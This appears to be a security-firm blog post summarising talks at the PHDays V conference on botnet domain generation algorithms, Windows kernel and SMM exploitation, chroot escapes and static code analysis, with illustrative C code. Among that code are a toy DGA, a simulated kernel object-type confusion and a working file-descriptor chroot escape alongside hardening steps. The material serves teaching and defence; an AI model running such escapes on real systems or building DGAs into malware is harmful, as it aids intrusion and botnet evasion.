Hello Insinuator Followers,
At the end of May, eight ERNW members travelled to Moscow (Russia) to attend the PHDays V conference. It was a very nice trip: we met a lot of kind people, ate some great food, had quite some fun in this exciting and history-laden metropolis, and managed to get around using hands and feet (and Google Translate ;-)).
The remainder of this post contains summaries of some of the most interesting talks at PHDays V:
DGAs and Threat Intelligence
By John Bambenek
John Bambenek, a chief forensic examiner from the USA, shared his experience in taking down botnets. He focused on so-called Domain Generation Algorithms (DGAs), which botnet malware uses to derive a fresh set of candidate domain names under which its command and control (C&C) servers can be reached; the botmaster registers one of them, and every bot computes the same list and tries them. The important requirement is that all peers of the botnet use the same seed, so that they generate the same domain names. John illustrated that first-generation botnets used static domain lists and/or static seeds for their DGAs, which allowed investigators to predict the domains and register (sinkhole) them before the botmaster could, cutting the bots off from their C&C servers and taking the botnet down. The current generation of botnet malware, however, uses the daily currency exchange rates of international banks as seeds for its DGAs. As this information cannot be predicted ahead of time, there is currently no way to pre-register the domains and take down this kind of botnet.
Besides this technical background, John also shared some interesting statistics and examples:
The famous and widely known worm Conficker (exploiting MS08-067) used a PRNG seeded with the current date for its DGA. Versions A and B of the worm generated 250 domain names per day across 5 (A) and 8 (B) top-level domains.
CryptoLocker, malware spread over multiple different channels (the Flashback OSX worm, PDFs, browser exploits, etc.), generated 1000 domains per day across 7 TLDs until it was taken down by registering a few thousand of those domains, which prevented the bots from connecting to their C&C servers.
The currently active botnet malware Bedep downloads an XML document from the official website of the European Central Bank, parses several exchange-rate values out of it and uses them as the seed for its next round of domain generation. Further information about this botnet malware can be found here.
According to John, most future DGAs will either use information that cannot be predicted (to prevent take-down attempts) or they will use Tor for their C&C servers, which is another way for botnet malware to stay hidden.
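To make the seed argument concrete, here is a toy DGA written for this post (it is not John's code and not any real family's algorithm): a small xorshift PRNG derives a day's domain list from a seed, which is either the date alone or the date mixed with a value the bots fetch on that day, in the style of Bedep. The TLD list, the 250-per-day count, the dates and the "exchange rate" strings are constructed for the example. The defender-side function shows why the static variant can be blocklisted days ahead while the externally seeded one can only be followed once the value is public.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <time.h>

/* Constructed TLD list and per-day count (the Conficker A/B figure). */
static const char *TLDS[] = { "com", "net", "org", "info", "biz" };
#define NTLDS      (sizeof TLDS / sizeof TLDS[0])
#define PER_DAY    250
#define DOMAIN_MAX 24

/* Tiny xorshift64 PRNG: every bot steps the same state from the same seed. */
static uint64_t next_rand(uint64_t *s)
{
    uint64_t x = *s;
    x ^= x << 13; x ^= x >> 7; x ^= x << 17;
    return *s = x;
}

/* Static seed: derived from the calendar alone, so known to everyone in advance. */
uint64_t date_seed(int y, int m, int d)
{
    return 0x9E3779B97F4A7C15ULL ^ ((uint64_t)y << 32 | (uint64_t)m << 16 | (uint64_t)d);
}

/* Bedep-style seed: the date plus a value only published on that day
 * (e.g. an exchange rate), mixed in FNV-style. */
uint64_t external_seed(int y, int m, int d, const char *published_value)
{
    uint64_t s = date_seed(y, m, d);
    for (const char *p = published_value; *p; p++)
        s = (s ^ (uint8_t)*p) * 0x100000001B3ULL;
    return s;
}

/* Derive 'count' candidate C&C domains (8-11 letters + TLD) from a seed. */
void generate_domains(uint64_t seed, char out[][DOMAIN_MAX], int count)
{
    uint64_t state = seed ? seed : 1;  /* xorshift must not start at 0 */
    for (int i = 0; i < count; i++) {
        int len = 8 + (int)(next_rand(&state) % 4), j;
        for (j = 0; j < len; j++)
            out[i][j] = (char)('a' + next_rand(&state) % 26);
        out[i][j++] = '.';
        strcpy(&out[i][j], TLDS[next_rand(&state) % NTLDS]);
    }
}

static void next_day(int *y, int *m, int *d)
{
    struct tm t = { 0 };
    t.tm_year = *y - 1900; t.tm_mon = *m - 1; t.tm_mday = *d + 1; t.tm_hour = 12;
    mktime(&t);  /* normalises the day overflow across month/year ends */
    *y = t.tm_year + 1900; *m = t.tm_mon + 1; *d = t.tm_mday;
}

/* Defender's side for the static-seed family: every list for the next 'days'
 * can be computed today, so the domains can be registered before the bots ask. */
int is_predicted_domain(const char *domain, int y, int m, int d, int days)
{
    static char list[PER_DAY][DOMAIN_MAX];
    for (int i = 0; i < days; i++) {
        generate_domains(date_seed(y, m, d), list, PER_DAY);
        for (int k = 0; k < PER_DAY; k++)
            if (strcmp(list[k], domain) == 0) return 1;
        next_day(&y, &m, &d);
    }
    return 0;
}

/* Self-check: a domain from the 2015-06-01 list is caught by a ten-day
 * blocklist prepared on 2015-05-26. */
int demo_static_seed_predictable(void)
{
    char list[PER_DAY][DOMAIN_MAX];
    generate_domains(date_seed(2015, 6, 1), list, PER_DAY);
    return is_predicted_domain(list[17], 2015, 5, 26, 10);
}

/* Self-check: for the externally seeded variant, guessing the published value
 * slightly wrong yields a completely different list, so nothing can be
 * pre-registered; the defender can only follow along once the value is out. */
int demo_external_seed_unpredictable(void)
{
    char a[PER_DAY][DOMAIN_MAX], b[PER_DAY][DOMAIN_MAX];
    generate_domains(external_seed(2015, 6, 1, "1.0980"), a, PER_DAY);
    generate_domains(external_seed(2015, 6, 1, "1.0981"), b, PER_DAY);
    int same = 0;
    for (int i = 0; i < PER_DAY; i++) same += strcmp(a[i], b[i]) == 0;
    return same == 0;
}

int main(void)
{
    char list[PER_DAY][DOMAIN_MAX];
    generate_domains(date_seed(2015, 6, 1), list, 5);
    for (int i = 0; i < 5; i++) printf("%s\n", list[i]);
    printf("static seed predictable: %d\n", demo_static_seed_predictable());
    printf("external seed guess-proof: %d\n", demo_external_seed_unpredictable());
    return 0;
}
```

The second self-check is the whole point of the exchange-rate trick: the bots and the investigator both have to wait for the same daily publication, which removes the head start that made sinkholing work against date-seeded families.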
Memory Corruption: from Sandbox to SMM
By Nikita Tarakanov
Nikita presented some of his exploitation techniques for the Windows kernel and how to gain control in System Management Mode (SMM). The talk was given in Russian but was simultaneously translated into English (although the translators were a bit overwhelmed by the highly technical topic).
The first part of the talk focused on gaining control in ring0 (kernel mode) from ring3 (user mode) by using memory corruption. Nikita focused on pool overflows and in particular on object metadata corruption (DKOHM, Direct Kernel Object Header Manipulation) and object type confusion (DKOHM + DKOM, Direct Kernel Object Manipulation).
For DKOHM, the kernel's object type table contains a special placeholder entry that refers to the address 0xbad0b0b0 instead of a real object type. By corrupting an object header so that its type index selects this entry, and by mapping memory at that address via heap spraying, an attacker can plant a fake object type whose callback pointers the kernel follows, and thus execute arbitrary code in the ring0 context. This special entry was removed in Windows 8.1, so another technique was needed to get ring0 execution: fooling the kernel object manager about which type the current object actually has. After several dereferences this leads to controllable callback pointers => WIN!
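A model of the dereference chain the DKOHM technique abuses, added here as an illustration (it is not Nikita's code, and the structures are simplified stand-ins rather than the real Windows OBJECT_HEADER/OBJECT_TYPE layouts): the header's type index selects a table entry, the entry is treated as an object type, and the kernel calls through the callback it finds there. The placeholder index, the sprayed fake type and the marker values are constructed for the example; the three scenarios show an intact header, a corrupted header without a spray (a crash) and a corrupted header with the placeholder address backed by attacker memory.

```c
#include <stdint.h>
#include <stdio.h>

typedef void (*close_proc_t)(int *marker);

/* Stand-in for OBJECT_TYPE/TypeInfo: the callbacks the kernel invokes. */
typedef struct { close_proc_t close_procedure; } object_type_t;

/* Stand-in for OBJECT_HEADER: only the type index matters for this model. */
typedef struct { uint8_t type_index; uint8_t flags; } object_header_t;

static void legit_close(int *m)    { *m = 1; }     /* the real type's callback */
static void attacker_close(int *m) { *m = 0x41; }  /* stands in for ring0 shellcode */

static object_type_t file_type = { legit_close };

/* What the attacker sprays from user mode so that it lands at the placeholder
 * address. In the model it is an ordinary static object. */
static object_type_t sprayed_fake_type = { attacker_close };

/* Stand-in for the kernel's type index table. Entry 1 is the placeholder the
 * talk mentions (0xbad0b0b0 on affected versions): it is not a real type. */
#define PLACEHOLDER_INDEX 1
#define FILE_INDEX        2
static object_type_t *type_index_table[3];

static void init_model(int sprayed)
{
    type_index_table[0] = NULL;
    type_index_table[PLACEHOLDER_INDEX] = sprayed ? &sprayed_fake_type : NULL;
    type_index_table[FILE_INDEX] = &file_type;
}

/* The dereference chain on close: header -> table[type_index] -> callback.
 * Returns the marker the callback sets, or -1 if the lookup hit unmapped
 * memory (a bugcheck in the real kernel). */
int kernel_close_object(const object_header_t *hdr)
{
    int marker = 0;
    object_type_t *type = type_index_table[hdr->type_index];
    if (type == NULL) return -1;
    type->close_procedure(&marker);
    return marker;
}

/* Scenario driver: 'overflow' models a pool overflow that reaches the adjacent
 * object's header and rewrites its type index; 'sprayed' models whether the
 * attacker managed to get memory at the placeholder address first. */
int run_scenario(int overflow, int sprayed)
{
    init_model(sprayed);
    object_header_t hdr = { FILE_INDEX, 0 };
    if (overflow) hdr.type_index = PLACEHOLDER_INDEX;
    return kernel_close_object(&hdr);
}

int main(void)
{
    printf("intact header          -> %d (legit callback)\n", run_scenario(0, 0));
    printf("corrupted, no spray    -> %d (crash)\n",          run_scenario(1, 0));
    printf("corrupted + heap spray -> 0x%x (attacker code)\n", run_scenario(1, 1));
    return 0;
}
```

The model makes the two preconditions of the technique visible: a write that reaches the neighbouring header's type index, and memory under the attacker's control at the fixed address the placeholder entry points to. Removing the placeholder entry takes away the second one, which is why a different confusion was needed afterwards.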
In the second part Nikita went a step further and tried to gain even more privileges: execution in SMM. This mode is normally reserved for hardware and firmware vendor operations and is protected even from the kernel. The protection is provided by a locked memory region (SMRAM), which also holds the CPU state saved on entry to SMM so that the normal program flow can continue after an SMI handler has finished its work. Nikita was able to overwrite the stored base address (SMBASE) of this region so that the next SMI jumped to a fake SMI handler under his control.
This handler disables the hardware protection of the original SMRAM and resets the base address to its original value. From then on he can completely control the contents of SMRAM from kernel mode and is therefore able to run arbitrary code in SMM.
Slides can be found here.
Chw00t: Breaking Unices’ Chroot Solutions
By Balazs Bucsay
In this talk Balazs showed how insecure chroot can be when it is used as a security measure.
According to Balazs, many users still use chroot as a security measure to prevent access to other filesystem trees (instead of solutions like FreeBSD jail or Linux LXC). He presented several ways to gain access to the outer filesystem tree once you are placed inside a chroot environment.
tl;dr: if you can get hold of a file descriptor that points to a file or directory outside the chroot environment, you win.
His examples accordingly represent different ways to obtain such a file descriptor.
Some of the techniques require root privileges:
- inject a kernel module
- get access to a process outside of the chroot
- create an inner chroot and pass a file descriptor from the outer environment into it
and some do not:
- find files/directories which will be moved outside of the environment by external processes
- attach to another process via ptrace (only on BSD)
Nearly all of the techniques were fairly simple and showed once again that you should not rely on chroot to prevent users from accessing specific files or directories.
Balazs started his presentation with a list of requirements that need to be considered if you want to use chroot in a more secure way:
- all directories have to be owned by root:root
- no setuid binaries may be accessible by the user
- distinct and unique uids/gids across users
- users cannot modify sensitive files or directories
- close all file descriptors before changing into the chroot environment
- change the current working directory into the new root before chrooting
- don’t mount /proc inside the chroot
- use /var/empty for empty environments
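Both halves of the talk in code, as an added example (not part of the original post and not Balazs' chw00t tool): secure_chroot() applies the checklist above, and escape_with_fd() performs the file-descriptor escape from the list of techniques, the one where a directory descriptor from outside the jail has been left open. Linux is assumed; the jail path /tmp/jail and the uid/gid 65534 are constructed for the example, and both chroot() and the escape need root (CAP_SYS_CHROOT), so main() only attempts the escape when started as root. The fd-cleanup self-check runs unprivileged.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Close every descriptor above 'keep' so that nothing pointing outside the
 * new root survives into the jail. Returns the number actually closed. */
int close_fds_above(int keep)
{
    long maxfd = sysconf(_SC_OPEN_MAX);
    int closed = 0;
    if (maxfd < 0 || maxfd > 65536) maxfd = 65536;
    for (long fd = keep + 1; fd < maxfd; fd++)
        if (close((int)fd) == 0) closed++;
    return closed;
}

/* The checklist in code: root-owned jail the user cannot write to; chdir in
 * first; close stray fds; chroot("."); chdir("/") again; then drop privileges,
 * after which no further chroot() is possible. */
int secure_chroot(const char *jail, uid_t uid, gid_t gid)
{
    struct stat st;
    if (stat(jail, &st) < 0) return -1;
    if (!S_ISDIR(st.st_mode) || st.st_uid != 0 || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        errno = EACCES;                      /* not root-owned, or writable by the user */
        return -1;
    }
    if (chdir(jail) < 0) return -1;          /* cwd must already be inside the new root */
    close_fds_above(STDERR_FILENO);
    if (chroot(".") < 0) return -1;
    if (chdir("/") < 0) return -1;           /* never keep a cwd outside the root */
    if (setgroups(0, NULL) < 0 || setgid(gid) < 0 || setuid(uid) < 0) return -1;
    return 0;
}

/* The escape the talk is about: one directory fd from outside is enough, as
 * long as the caller is still root inside the jail. */
int escape_with_fd(int outside_dir_fd)
{
    if (fchdir(outside_dir_fd) < 0) return -1;  /* cwd is now outside the chroot */
    for (int i = 0; i < 64; i++)                /* ".." is only clamped at a root; walk up to the real one */
        if (chdir("..") < 0) return -1;
    return chroot(".");                         /* and move the root there too */
}

/* Unprivileged self-check for the fd-closing helper: two extra descriptors
 * are opened, the cleanup runs, and both must be gone afterwards. */
int demo_close_fds(void)
{
    int a = open("/dev/null", O_RDONLY), b = open("/dev/null", O_RDONLY);
    if (a < 0 || b < 0) return 0;
    close_fds_above(STDERR_FILENO);
    return fcntl(a, F_GETFD) < 0 && errno == EBADF
        && fcntl(b, F_GETFD) < 0 && errno == EBADF;
}

int main(void)
{
    printf("fd cleanup self-check: %s\n", demo_close_fds() ? "ok" : "FAILED");
    if (geteuid() != 0) { puts("escape demo needs root (CAP_SYS_CHROOT)"); return 0; }

    /* Sloppy jail: an fd to the real / is left open and we stay root inside. */
    int outside = open("/", O_RDONLY | O_DIRECTORY);
    if (outside < 0) return 1;
    if (mkdir("/tmp/jail", 0755) < 0 && errno != EEXIST) return 1;
    if (chdir("/tmp/jail") < 0 || chroot(".") < 0) return 1;
    printf("inside jail, /tmp/jail visible: %s\n", access("/tmp/jail", F_OK) == 0 ? "yes" : "no");
    if (escape_with_fd(outside) == 0)
        printf("escaped, /tmp/jail visible: %s\n", access("/tmp/jail", F_OK) == 0 ? "yes" : "no");
    else
        perror("escape");
    return 0;
}
```

Run as root, the first line prints "no" (inside the jail the real /tmp/jail is not reachable) and the second prints "yes". Each step of secure_chroot() closes one of the doors the escape relies on: the closed descriptors remove the fd, the chdir("/") removes a cwd outside the root, and the uid drop removes the ability to call chroot() again.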
Static Analysis of Source Code After 200 Open-Source Projects
By Andrey Karpov and Evgeny Ryzhkov
Andrey Karpov, the inventor and developer of the static code analyzer Viva64, presented the overall results of his last 200 open-source code review projects. In these projects he gathered a lot of experience in the field of open-source development, and he wanted to share the seven most common failures with the audience. During the first few slides Andrey introduced himself and showed a short list of his review projects, which included large open-source projects like Chromium, Tor, the Linux kernel, Oracle VirtualBox, Firefox and so on. After this introduction he started with the "seven sins of programmers", as he called them. Most of these "sins" are simple mistakes where programmers rely on compiler behaviour that does not apply in some specific cases. Copy & paste mistakes are also very common and therefore part of the seven sins: a bunch of lines gets pasted several times into the source code, only one value has to be changed in each copy, and the developer misses one, creating a bug that is hard to find. He also noted that there is a lot of talk about security in the open-source world, but hardly anyone really tests for it, which in his opinion has to improve in the future.
All in all, Andrey showed that many mistakes in open-source software result not only from technical problems but also from the way developers work, sometimes running their heads against walls when dealing with complex applications. He gave a nice overview of the reasons behind the most common development problems, even though he did not describe ways to find them more efficiently.
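An illustration of the copy & paste sin, constructed for this post rather than taken from any of the projects Andrey reviewed: three near-identical bounds checks with the edit missed in the third one, next to the corrected version, and a lookup that shows what the missed edit costs. The vec3/grid types and the test point are made up for the example.

```c
#include <stdio.h>

struct vec3 { int x, y, z; };

/* Buggy: the third line was pasted from the second and 'y' never became 'z',
 * so the upper bound of z is never enforced. */
int in_bounds_buggy(const struct vec3 *v, const struct vec3 *lim)
{
    if (v->x < 0 || v->x > lim->x) return 0;
    if (v->y < 0 || v->y > lim->y) return 0;
    if (v->z < 0 || v->y > lim->z) return 0;   /* bug: should compare v->z */
    return 1;
}

/* Fixed: each coordinate is compared with its own limit. */
int in_bounds_fixed(const struct vec3 *v, const struct vec3 *lim)
{
    if (v->x < 0 || v->x > lim->x) return 0;
    if (v->y < 0 || v->y > lim->y) return 0;
    if (v->z < 0 || v->z > lim->z) return 0;
    return 1;
}

/* Why the bug matters: a point the check lets through indexes a fixed-size grid. */
#define GRID 4
typedef int (*bounds_check_t)(const struct vec3 *, const struct vec3 *);

int grid_lookup(const int grid[GRID][GRID][GRID], const struct vec3 *p, bounds_check_t check)
{
    struct vec3 lim = { GRID - 1, GRID - 1, GRID - 1 };
    if (!check(p, &lim)) return -1;              /* rejected */
    return grid[p->x][p->y][p->z];               /* out-of-bounds read if the check lied */
}

/* Returns 1 if the buggy check accepts a point the fixed one rejects. */
int demo_missed_edit(void)
{
    struct vec3 p = { 1, 1, 99 };                /* z far outside the grid */
    struct vec3 lim = { GRID - 1, GRID - 1, GRID - 1 };
    return in_bounds_buggy(&p, &lim) == 1 && in_bounds_fixed(&p, &lim) == 0;
}

/* With the fixed check the lookup rejects the same point instead of reading
 * past the end of the array. */
int demo_fixed_rejects(void)
{
    static const int grid[GRID][GRID][GRID] = { { { 0 } } };
    struct vec3 p = { 1, 1, 99 };
    return grid_lookup(grid, &p, in_bounds_fixed);
}

int main(void)
{
    printf("missed edit lets z=99 through: %s\n", demo_missed_edit() ? "yes" : "no");
    printf("fixed check on z=99: %d (rejected)\n", demo_fixed_rejects());
    /* grid_lookup(grid, &p, in_bounds_buggy) would read 95 ints past the end. */
    return 0;
}
```

The buggy line compiles cleanly and passes any test that only varies x and y, which is exactly why this pattern survives review; a static analyzer flags it because the third check differs from its neighbours in a way that leaves one variable unreferenced.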
Grab his slides here.
We had a great time in Russia and we're looking forward to seeing some of our friends at Troopers next year 🙂
Your ERNW Squad ‘Moscow’